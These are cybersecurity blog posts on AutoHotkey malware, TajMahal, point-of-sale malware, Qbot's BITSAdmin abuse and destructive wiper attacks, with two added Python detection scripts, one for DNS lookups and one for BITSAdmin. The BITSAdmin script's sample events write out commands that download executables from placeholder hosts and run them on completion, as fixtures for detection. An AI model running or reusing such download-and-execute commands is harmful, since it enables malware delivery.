An example of malware that abuses AutoHotkey is the malware called “Win32/Ahkarun.A”, an AutoHotKey compiled script that spreads itself without any human interaction through removable drives and sends the user's IP address to a remote server. According to Microsoft, which reported about the malware in June 2008, Ahkarun uses the common icon resembling a Windows file folder in order to trick a user into opening and executing the malware.
Once executed on the victim’s computer, this malware then awaits connections of removable media such as USB thumb drives, and when this happens the malware copies itself and components to the removable drive, and as a result performing malicious actions such as identifying the IP address of the infected machine and sending the obtained IP address to a predefined email account.
In February 2018, the research team at Ixiareported two cases of AutoHotkey-based malware, one distributing an cryptocurrency mining malware and the other distributing a clipboard hijacker. In cryptocurrency mining, an attacker hijacks the computing power of someone else’s computer for cryptocurrency mining. In clipboard hijacking, meanwhile, in the AutoHotkey-based malware discovered by the Ixia research team stays in the compromised computer’s memory and awaits for any activity in the clipboard. When a user inputs into the clipboard a cryptocurrency wallet address, the malware replaces the user’s cryptocurrency wallet address to the address owned and controlled by the attacker, thus tricking the victim into sending cryptocurrency to the attacker instead.
In March 2018, researchers at Cybereasondiscovered an AutoHotkey-based malware they called “Fauxpersky” as this malware masquerades as Kaspersky Antivirus and spreads through infected USB drives. Fauxpersky has a keylogging feature, recording every keystroke made by a computer user, exfiltrating the data recorded through Google Forms and depositing it in the attacker’s inbox.
As shown in the above-mentioned examples of AutoHotkey-based malware, criminals are starting to abuse legitimate Windows tool AutoHotkey. Being a legitimate Windows tool, often used by system administrators, AutoHotkey flies under the radar and drops a varied range of payloads – part of the malware that performs malicious actions – without triggering any anti-malware alarms.
One of the reasons why we see lesser abuses of AutoHotkey by cyber attackers, to date, is due to the fact that this software isn’t pre-installed on Windows computers. Attackers, therefore, have to take an extra step of dropping the software onto the victim’s computer and executing it in order for this tool to work.
Training your organization’s staff to recognize, avoid and report suspicious emails is one approach that could prevent AutoHotkey abuses. As exemplified in the newly discovered AutoHotkey-based malware, attackers initially infect their victims through phishing attacks, a type of cyber attack that utilized emails as a weapon.
Another approach in preventing AutoHotkey abuses is by disabling your organization’s active content (data connections or macros). When active content is disabled, the next time your organization’s staff receives an active content via email, this content can’t be opened and the Message Bar with the notice "Macros have been disabled” will then appear as an alert that the active content may contain malware and other security hazards that could harm your organization’s computer or network.
Why TajMahal Is the Most Alarming Malware to Date
The discovery of the malware called “TajMahal” is alarming, not because it attacked a particular diplomatic organization but because of the high number of malicious actions it can perform, totaling 80, and its stealth: it evaded discovery for nearly 5 years.
Researchers at Kaspersky Lab recently revealed that a diplomatic organization of a Central Asian country, a type of organization often subject to cyber-attack because of its line of work, was a victim of the malicious software (malware) TajMahal. The malware, the researchers said, remained undetected in the organization’s network for nearly 5 years, with the first known legitimate sample timestamp from August 2013 and the last from April 2018. The first confirmed date on which TajMahal samples were seen on a victim’s machine is August 2014. The researchers said they first discovered the malware on the victim’s machine in the autumn of 2018.
Old and New Hacking Tools
According to Kaspersky Lab researchers, TajMahal comes in two packages, one named “Tokyo” and the other “Yokohama”. Tokyo and Yokohama, the researchers said, share the same code base and were found on all infected computers of the diplomatic organization. The Tokyo package facilitates the first stage of the infection, while the Yokohama package deploys the staggering 80 malicious capabilities.
The Tokyo package uses a PowerShell script, an old and tested strategy of cyber attackers. A McAfee Labs report found that PowerShell attacks increased between 2016 and 2017, and IBM X-Force also noted the growth of PowerShell attacks from October 2017 to October 2018.
PowerShell is a legitimate tool used by system administrators to simplify and automate the management of Microsoft Windows and Windows Server. Malicious actors, meanwhile, use PowerShell to hide their malicious code, as the code is executed directly from memory, making the attack fileless and thus stealthier than other types of attack. PowerShell also allows remote access – the ability to manage a computer from anywhere in the world so long as it is connected to the internet.
Yokohama, meanwhile, unleashes the payloads – the portion of the malware that performs malicious actions – of which Kaspersky Lab researchers uncovered 80. Old hacking techniques in the Yokohama package include keylogging and audio, screen and webcam grabbing. In keylogging, every keystroke made by a computer user is recorded and sent to the malicious actors. In audio, screen and webcam grabbing, screenshots, audio or video, for instance from VoIP audio or video calls, are covertly recorded and then sent to the malicious actors.
Aside from the slew of time-tested hacking tools, the Yokohama package in particular, and TajMahal in general, packed the following new hacking capabilities:
Intercepting documents from the print queue and stealing data from burned CDs and USB sticks are particularly alarming, as documents that are printed or copied to a CD or USB stick are typically sensitive and important. Any data stolen by the malware, whether text, audio, video or image, is then sent, in the form of an XML file called "TajMahal" – the origin of the malware’s name – to the command and control server, a computer controlled by the attackers.
According to the researchers at Kaspersky Lab, it isn’t known how the TajMahal malware initially infected the diplomatic organization. It is also not known who the individual or group behind TajMahal is, as the malware bears no resemblance to other known malware, which means the attackers created it using a new code base to evade detection. Anti-malware solutions typically block malware that bears even a small resemblance to other known malware.
To date, the only known victim of TajMahal is the diplomatic organization. According to the researchers at Kaspersky Lab, it’s unlikely that the attackers went to all the trouble of creating new malware for just one victim; the more likely theory is that there are other victims that have yet to be identified. The researchers said this theory is supported by the fact that they “couldn’t see how one of the files in the VFS was used by the malware, opening the door to the possibility of additional versions of the malware that have yet to be detected”.
TajMahal shows the characteristics of an advanced persistent threat (APT), a cyberattack in which the attackers gain unauthorized access to a network and remain undetected for a prolonged period. The usual suspects behind APT attacks are nation-state actors – individuals who have the “license to hack” on behalf of a particular nation or state to gain access to valuable data or intelligence, and who can create cyber incidents of international significance.
In recent years, however, common cyber criminals, those whose motive is simply profit, have gotten hold of the APT tools used by nation-state actors, making these tools part of their arsenal for attacking not just large organizations but also small and medium-sized ones – attacks to which these organizations have proven vulnerable.
For instance, the APT hacking tool called “EternalBlue” has joined the long line of reliable favorites of common cyber criminals. EternalBlue is one of the hacking tools leaked publicly in 2017 by the group known as the “Shadow Brokers”. The tool is believed to have been created by the U.S. National Security Agency (NSA) for its surveillance activities. A month before the public release of EternalBlue, Microsoft issued a security update fixing the vulnerability that EternalBlue exploits.
This security update, however, wasn’t installed in time on hundreds of thousands of computers worldwide, leading to the successful unleashing of WannaCry, malware that uses the EternalBlue tool to exploit the vulnerability in the Windows SMBv1 server (patched by Microsoft a month earlier), remotely encrypting files, locking users out of their own files and spreading to other computers within a network without user interaction. Since the EternalBlue leak, many malware families have integrated EternalBlue.
Combating malware and APT threats has become a daily reality for many organizations. It requires specialized skills and resources. When your organization needs help, our cybersecurity experts are a phone call away. Contact us today.
POS Malware Continues to Target Small and Medium-Sized Businesses
Two organizations, Flashpoint and Cisco Talos, recently revealed that point-of-sale (POS) malware continues to be a threat to small and medium-sized businesses.
What Is Point-of-Sale (POS) Malware?
Point-of-sale (POS) malware is malicious software that specifically targets POS systems, the systems used for credit card transactions when paying for goods or services. Attackers may install POS malware physically, by tampering with PIN entry device pads or swapping out devices, an attack known as payment card skimming.
Another way of installing POS malware is remote installation, that is, installing the malware on environments where card-present retail transactions are conducted, from a different computer stationed in another location. This blog post covers remote POS intrusions.
The goal of POS malware is to obtain customers’ credit card details. Stolen credit card details are typically sold by cyber criminals on the dark web. Buyers use them to commit credit card fraud – unauthorized charges on someone else’s credit card.
Flashpoint researchers reported that the POS malware called DMSniff has been actively used by cyber criminals since at least 2016 against small and medium-sized businesses in the restaurant and entertainment industries. Like other POS malware, DMSniff harvests credit card details. Flashpoint researchers said the DMSniff malware was previously only sold privately.
One feature of DMSniff that’s rarely seen in POS malware, Flashpoint researchers noted, is the use of a domain generation algorithm (DGA), which creates lists of command-and-control domains on the fly. Command-and-control domains are important to cyber criminals, as malware typically receives commands and sends stolen data via these domains.
To cripple a malware’s effectiveness, that is, to prevent it from receiving commands or sharing stolen data, law enforcement or hosting providers take down its command-and-control domains. With a domain generation algorithm, attackers can generate new command-and-control domains on the fly in case one domain is taken down. In addition, a domain generation algorithm also bypasses weak blocking mechanisms.
Cisco Talos researchers, meanwhile, reported on the proliferation of the new POS malware called GlitchPOS. The sale of this malware opened a few weeks ago on one crimeware forum, and it later turned up for sale on another. The author of GlitchPOS even created a video showing how the malware harvests credit card details.
Like other POS malware, the main purpose of GlitchPOS is to steal credit card details from the memory of the infected system. Unlike DMSniff, with its advanced domain generation algorithm, GlitchPOS contains few functions: it connects to the command-and-control server to register the infected system, exfiltrate credit card numbers scraped from the infected system’s memory, update the "encryption" key and clean itself up. Online services such as Dropbox and Google Drive are at times used by cyber criminals as command-and-control servers.
Verizon’s 2018 Data Breach Investigations Report found that the accommodation and food services industry was the hardest-hit sector for remote POS intrusions in 2018, with remote POS breaches 40 times more likely to occur in that industry than in others.
The 2018 Verizon report added that remote POS intrusions went undiscovered for months in 96% of cases, and were only discovered via external sources such as detection as a Common Point of Purchase (CPP) or by law enforcement.
In February this year, North Country Business Products (NCBP), a Minnesota-based provider of point-of-sale products, disclosed that nearly 140 of its customers, mostly bars, restaurants and coffee shops all over the US, had POS systems infected with malware.
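A heuristic of the kind a defender would run over DNS logs to spot DGA-style lookups, added here as an example that is not part of the original post or of the Flashpoint report; the log lines, client addresses and scoring thresholds are constructed for illustration. It scores each queried name on traits of machine-generated labels and then flags clients that query several such names, since a bot walking its generated list produces a burst of lookups that a static blocklist never matches.

```python
import math
import re
from collections import Counter, defaultdict

# Constructed DNS query log lines (timestamp, client, "query", name). These are
# illustrative entries, not data from the Flashpoint report.
SAMPLE_DNS_LOG = """\
2019-03-14T10:01:02Z 10.0.5.21 query updates.example.com
2019-03-14T10:01:05Z 10.0.5.21 query xk3fj9qwz2lpvm.com
2019-03-14T10:01:09Z 10.0.5.33 query mail.example.org
2019-03-14T10:01:12Z 10.0.5.21 query qzrtvbnmlkpw.net
2019-03-14T10:01:15Z 10.0.5.21 query a7c9e1f3b5d2h4.org
2019-03-14T10:01:20Z 10.0.5.40 query thunderbird.net
2019-03-14T10:01:24Z 10.0.5.33 query cdn.example.net
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+query\s+(\S+)$")
VOWELS = set("aeiou")


def parse_log(text: str):
    """Yield (timestamp, client, domain) for each well-formed line; skip the rest."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            yield m.group(1), m.group(2), m.group(3).lower().rstrip(".")


def shannon_entropy(s: str) -> float:
    """Bits per character; a random-looking label scores higher than a word."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())


def registrable_label(domain: str) -> str:
    """Naive second-level label; a public-suffix list would do this properly."""
    parts = domain.split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def dga_score(domain: str) -> int:
    """Count how many machine-generated traits the registrable label shows."""
    label = registrable_label(domain)
    n = len(label)
    if n == 0:
        return 0
    traits = [
        shannon_entropy(label) > 3.2,                  # near-uniform character mix
        sum(ch.isdigit() for ch in label) / n > 0.2,   # digits sprinkled through the name
        sum(ch in VOWELS for ch in label) / n < 0.25,  # unpronounceable consonant runs
        n >= 12,                                       # long label
    ]
    return sum(traits)


def suspicious_queries(log_text: str, threshold: int = 3) -> list:
    """Queried names whose label trips at least `threshold` traits, in log order."""
    return [d for _, _, d in parse_log(log_text) if dga_score(d) >= threshold]


def suspicious_clients(log_text: str, min_hits: int = 2, threshold: int = 3) -> dict:
    """Clients that looked up several DGA-like names: the pattern of a bot cycling
    through its generated list, most of which is not registered on any given day."""
    hits = defaultdict(list)
    for _, client, domain in parse_log(log_text):
        if dga_score(domain) >= threshold:
            hits[client].append(domain)
    return {c: ds for c, ds in hits.items() if len(ds) >= min_hits}


if __name__ == "__main__":
    for client, domains in suspicious_clients(SAMPLE_DNS_LOG).items():
        print(client, "->", ", ".join(domains))
```

Tune the thresholds against your own resolver logs before alerting on them; CDN and tracking hostnames are the usual source of false positives for a label-only heuristic.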
Causes of Remote POS Intrusions
Here are some of the common causes of remote POS intrusions:
SSH Brute Forcing & Common Exploit Scanners
In the case of the DMSniff malware, Flashpoint researchers suspected (with low confidence) that the initial infection vector could be either SSH brute forcing or common exploit scanners.
In SSH brute forcing, an attacker tries every possible password until the SSH password is cracked. SSH, also known as Secure Shell or Secure Socket Shell, is a network protocol that gives users, particularly system administrators, a means to access a computer over the internet. Common exploit scanners, meanwhile, are automated tools used to test applications and networks against known and new security vulnerabilities.
Supply Chain Attack
Point-of-sale products supplier North Country Business Products revealed that the POS systems of nearly 140 of its business clients were infected with POS malware after cyber criminals compromised its IT system and later planted POS malware on the networks of some of its customers.
Lack of Trained Security Staff
Verizon’s 2018 Data Breach Investigations Report, meanwhile, said that businesses in the accommodation and food services industry rely almost exclusively on payment cards for their existence. Despite this reliance, businesses in this industry, restaurants in particular, are small organizations that typically don’t have trained security staff.
Good security controls and training will minimize the likelihood of a data breach for your business.
When you need the help of experienced cybersecurity professionals, our team is a phone call away. Contact us today and protect your business.
Decade-Old Qbot Banking Malware Makes a Comeback
The decade-old Qbot banking malicious software (malware) has made a comeback, this time exploiting a tool that already exists on targeted computers: BITSAdmin.
Researchers at Varonis revealed that thousands of computers around the globe have been compromised and are under active control by a new variant of the Qbot malware, this time leveraging BITSAdmin, a common administration tool. The researchers said they found 2,726 unique victim IP addresses infected with this new variant of Qbot.
The researchers added that the number of victims is likely much larger, as many organizations use port address translation that hides internal IP addresses. The majority of Qbot victims, Varonis researchers said, were located in the U.S., but victims were also found in Canada, the U.K., France, Brazil, Germany, South Africa, Russia, China and India.
What Is Qbot?
Qbot, also known as Qakbot or Pinkslipbot, is malware first observed in the wild in 2007. Over the years, it has morphed into various versions, due in part to the fact that its source code is publicly available. The various versions of Qbot retain the malware’s primary purpose: stealing online banking account information from compromised computers.
According to Microsoft, over the years the cybercriminals behind Qbot have improved its code, enabling the malware to better “evade detection, stay under the radar longer, and increase the chances of spreading to other potential victims.”
Various versions of Qbot, including the latest version observed by Varonis, steal online banking account information from compromised computers through keylogging and hooking.
In keylogging, every keystroke the victim enters is automatically captured and sent to the Qbot attackers. Hooking, also known as code hooking, modifies the behavior of a computer program. For instance, antivirus programs use hooking once they discover the presence of malware. On the flip side, cyberattackers use hooking as well, for instance to alter the behavior of a program or a browser, which can lead to the exfiltration of passwords and cookies (the text files that a web browser stores on a user's computer).
Another common feature of Qbot variants is worm-like capability: the ability to spread across an organization’s network and infect other systems without user interaction. According to Microsoft, Qbot "can drop copies in other machines in the network using Server Message Block (SMB) and then use remote execution to activate.” SMB is a Microsoft Windows protocol for sharing files over a network.
Another common feature of Qbot variants is the initial infection process. Like many other cyberattacks, Qbot initially arrives on the victim's computer through malicious email campaigns carrying a malicious attachment and/or link.
What Is BITSAdmin?
BITS in the name “BITSAdmin” stands for Background Intelligent Transfer Service. BITS is a component of Microsoft Windows operating systems that allows updates and other applications to transfer files in the background without interrupting other networked applications.
Cybercriminals have learned to abuse BITS, using this legitimate administration facility for downloading, executing and even cleaning up after running malicious code. The interface for creating and managing BITS jobs is accessible through PowerShell, a tool capable of executing code from memory and providing administrative access directly to a device's core, and through the BITSAdmin tool, which can be used to create download or upload BITS jobs and monitor their progress.
In the past, the cybercriminals behind Qbot have used PowerShell to download and run Mimikatz, another malicious tool that steals credentials, allowing attackers to move rapidly across a network once they have established an initial foothold.
Researchers at Varonis reported that the latest Qbot uses BITSAdmin, another common administration tool in Windows operating systems, to download Qbot’s loader – the component that executes the core malware.
The abuse of legitimate administration tools such as PowerShell and BITSAdmin is an example of “living off the land” techniques, cyberattacks that exploit tools already present on targeted computers. Exploiting these common administration tools makes detection difficult.
One probable explanation for why the attackers behind the latest Qbot variant use BITSAdmin instead of PowerShell is that PowerShell is now closely monitored on enterprise systems. A recent study conducted by IBM showed that more than half (57%) of cyberattacks exploit tools that already exist on targeted computers. The IBM study highlighted that the administration tool most often exploited by cyberattackers is PowerShell.
Cyberattackers that abuse PowerShell and BITSAdmin first have to execute their malicious code on the targeted computer. The initial infection in PowerShell- and BITSAdmin-based attacks is often a phishing attack, using malicious emails that contain malicious attachments and/or links.
In the case of the latest Qbot variant, Varonis researchers said the first infection was likely carried out via a phishing email that tricked the victim into running a malicious file. Cybersecurity best practices for mitigating phishing attacks therefore also apply to mitigating PowerShell- and BITSAdmin-based attacks. These measures include deleting suspicious emails, especially those containing suspicious links and/or attachments, and not enabling macros in Microsoft Office.
Disabling all BITS functionality as a preventive measure, meanwhile, is tricky, as it will likely have unintended side effects such as preventing legitimate software patching and updating. Mitigating measures specific to BITSAdmin-based attacks include modifying host firewall rules and other network controls to allow only legitimate BITS traffic, and monitoring usage of the BITSAdmin tool, including the command options “Transfer”, “Create”, “AddFile”, “SetNotifyFlags”, “SetNotifyCmdLine”, “SetMinRetryDelay” and “Resume”.
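Detection logic for the monitoring advice above, written here as an added example rather than code from Varonis or the original post. The process-creation events, the allowlist of update hosts and the list of suspicious parent processes are constructed assumptions; in practice the events would come from Sysmon Event ID 1 or Windows 4688 records. Beyond flagging single bitsadmin.exe invocations that use the watched switches, it correlates the separate Create, AddFile, SetNotifyCmdLine and Resume calls of one job, which together amount to download-then-execute.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Command options the post says to monitor (lowercased, without the slash).
WATCHED = {"transfer", "create", "addfile", "setnotifyflags",
           "setnotifycmdline", "setminretrydelay", "resume"}
# Assumed allowlist of hosts legitimate BITS jobs may reach (the firewall-rule counterpart).
ALLOWED_HOSTS = {"downloads.example.com", "update.example.com"}
# Assumed parents that should never spawn bitsadmin.exe: Office apps and script hosts.
SUSPICIOUS_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "wscript.exe",
                      "cscript.exe", "mshta.exe"}
URL_RE = re.compile(r'https?://([^/\s"]+)[^\s"]*', re.IGNORECASE)

# Constructed process-creation events (user, parent process name, command line),
# the fields a Sysmon Event ID 1 or Windows 4688 record carries. Not real telemetry.
SAMPLE_EVENTS = [
    {"user": "CORP\\admin1", "parent": "cmd.exe",
     "cmd": "bitsadmin /transfer drv /download /priority normal https://downloads.example.com/drv.cab C:\\drv\\drv.cab"},
    {"user": "CORP\\jdoe", "parent": "WINWORD.EXE",
     "cmd": "C:\\Windows\\System32\\bitsadmin.exe /transfer upd /download /priority high http://203.0.113.7/ld.exe C:\\Users\\Public\\ld.exe"},
    {"user": "CORP\\jdoe", "parent": "cmd.exe", "cmd": "bitsadmin /create job1"},
    {"user": "CORP\\jdoe", "parent": "cmd.exe",
     "cmd": "bitsadmin /addfile job1 http://198.51.100.9/a.dat C:\\Users\\Public\\a.dat"},
    {"user": "CORP\\jdoe", "parent": "cmd.exe",
     "cmd": "bitsadmin /setnotifycmdline job1 C:\\Users\\Public\\a.dat NULL"},
    {"user": "CORP\\jdoe", "parent": "cmd.exe", "cmd": "bitsadmin /resume job1"},
    {"user": "CORP\\admin1", "parent": "cmd.exe", "cmd": "bitsadmin /list /allusers"},
]


@dataclass
class Finding:
    user: str
    job: Optional[str]
    severity: str
    reasons: list


def tokenize(cmd: str) -> list:
    # Split a Windows command line, keeping double-quoted arguments whole.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmd)]


def job_name(tokens: list) -> Optional[str]:
    # The argument after the first watched switch is the BITS job name.
    for i, tok in enumerate(tokens[:-1]):
        if tok.startswith("/") and tok[1:].lower() in WATCHED:
            return tokens[i + 1]
    return None


def analyze_event(event: dict) -> Optional[Finding]:
    """Score one event; None unless it is bitsadmin using a watched switch."""
    tokens = tokenize(event["cmd"])
    exe = tokens[0].lower().rsplit("\\", 1)[-1] if tokens else ""
    if exe not in ("bitsadmin", "bitsadmin.exe"):
        return None
    hit = {t[1:].lower() for t in tokens if t.startswith("/")} & WATCHED
    if not hit:
        return None
    score, reasons = 1, ["watched switch: " + ", ".join(sorted(hit))]
    for m in URL_RE.finditer(event["cmd"]):
        if m.group(1).lower() not in ALLOWED_HOSTS:
            score += 2
            reasons.append("download from non-allowlisted host " + m.group(1))
    if event["parent"].lower() in SUSPICIOUS_PARENTS:
        score += 2
        reasons.append("spawned by " + event["parent"])
    if "setnotifycmdline" in hit:
        score += 2
        reasons.append("job runs a command when the transfer completes")
    severity = "high" if score >= 4 else "medium" if score >= 3 else "low"
    return Finding(event["user"], job_name(tokens), severity, reasons)


def analyze_events(events: list) -> list:
    return [f for f in map(analyze_event, events) if f is not None]


def staged_jobs(events: list) -> list:
    """Jobs whose separate bitsadmin calls add up to download-then-execute."""
    seen = {}
    for f in analyze_events(events):
        if f.job:
            seen.setdefault((f.user, f.job), []).extend(f.reasons)
    return [job for (_, job), reasons in seen.items()
            if any(r.startswith("download from non-allowlisted") for r in reasons)
            and any(r.startswith("job runs a command") for r in reasons)]


if __name__ == "__main__":
    for f in analyze_events(SAMPLE_EVENTS):
        print(f.user, f.job, f.severity, "; ".join(f.reasons))
    print("download-then-execute jobs:", staged_jobs(SAMPLE_EVENTS))
```

The same scoring applies to the PowerShell BITS cmdlets mentioned earlier once their command lines are fed in, so one detection covers both interfaces the post names.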
Can Your Organization Survive a Cyberattack that Permanently Destroys Data?
Financial gain, either short-term or long-term, is the motive of most cyber criminals. Some cyber criminals, however, aren’t after financial gain; they’re simply out to cause as much damage as possible.
The recent cyberattack on email service provider VFEmail shows the unconventional motive of simple destruction. Milwaukee-based VFEmail, founded in 2001, provides email service to businesses and individuals.
The first hints of the cyberattack on VFEmail came out on February 11, when the company’s Twitter account issued a series of tweets about the attack, starting with one that said, “This is not looking good. All externally facing systems, of differing OS's and remote authentication, in multiple data centers are down.”
By 5 PM on February 11, the company declared on its website, “We have suffered catastrophic destruction at the hands of a hacker.” The company added that the attacker had destroyed nearly two decades' worth of emails, all data in the US on both primary and backup systems.
The company further said that the attacker hadn’t asked for a ransom. “Just attack and destroy," the company said. When asked about the identity of the attacker, VFEmail owner Rick Romero tweeted that it could be "someone who had data they didn't want found or I really pissed off."
This recent cyber incident isn’t the first time cyber criminals have targeted VFEmail. In a blog post dated November 4, 2015, Romero shared that a group of hackers had threatened to launch a distributed denial-of-service (DDoS) attack on his email service if he didn’t pay 5 Bitcoins.
True enough, after he refused to pay the ransom, VFEmail’s service was disrupted by a DDoS attack, prompting Romero to expose the group's extortion campaign. In 2017, the company’s email service was again disrupted by a series of DDoS attacks, prompting the company to move to a new hosting provider. In 2018, the service was once again disrupted by a DDoS attack.
It isn’t clear what actually caused the latest cyberattack on VFEmail. What is clear is that nearly two decades' worth of the company’s emails, all data in the US on both primary and backup systems, are lost forever.
Other Cases of Disruptive Cyberattacks
WannaCry and NotPetya
WannaCry and NotPetya are two examples of cyberattacks meant mainly to destroy. At the height of the WannaCry attack on May 12, 2017, an estimated 300,000 computers in 150 countries were infected by the WannaCry malicious software (malware). Six weeks after the WannaCry attack, the NotPetya malware was launched, although it didn’t have as much impact as WannaCry.
Both WannaCry and NotPetya exhibit the characteristics of ransomware, a type of malware designed to deny legitimate users access to computer files by encrypting them. Like other ransomware, the WannaCry and NotPetya attackers demanded a ransom from their victims, assuring them that once it was paid, the decryption key that would unlock the encrypted files would be provided.
While exhibiting the characteristics of ransomware, both WannaCry and NotPetya were later found to be wipers – malware whose sole purpose is destruction. Both are considered wipers rather than ransomware because, even when the ransom was paid, the attackers couldn’t provide the correct decryption key, as they had no way of determining who had paid and who hadn’t.
Shamoon is another malware whose main purpose is destruction. In December 2018, Italian oil services firm Saipem reported that its servers based in the Middle East, India, Aberdeen and, to a limited extent, Italy were infected by a variant of the Shamoon malware. As is typical of Shamoon, Saipem said in a statement, the infection resulted in the "cancellation of data and infrastructures." Days after the statement, the company’s head of digital and innovation, Mauro Piasere, told Reuters that the attack crippled between 300 and 400 servers and up to 100 personal computers out of a total of about 4,000 Saipem machines.
According to Symantec, the latest version of Shamoon is far more destructive than the original, as it carries a new, second piece of wiping malware called “Trojan.Filerase”, which deletes and overwrites files on the infected computer, while the Shamoon malware itself erases the computer’s master boot record, rendering the computer unusable.
Because of the Filerase component in the latest Shamoon version, Symantec said, recovery becomes impossible, whereas with the older version of Shamoon the “files on the hard disk may be forensically recoverable.”
Here are some cybersecurity best practices to help prevent or minimize the effects of destructive cyberattacks – attacks that are meant to destroy:
Keep All Software Up-to-Date
Installing the latest patches or security updates in a timely manner is one way to keep destructive attacks at bay. Patches and security updates fix known security vulnerabilities that are likely to be exploited by cyber criminals.
Back-up Important Data
Just as your organization safeguards its data from natural disasters such as fire and flood, having a backup of important data will enable your organization to bounce back from a debilitating destructive cyberattack.
Practice Network Segmentation
It’s also important to practice network segmentation – the process of dividing your organization’s network into subnetworks. Network segmentation ensures that if an attacker is able to infiltrate one of your organization’s subnetworks, the others won’t be affected.
Steve E. Driz, I.S.P., ITCP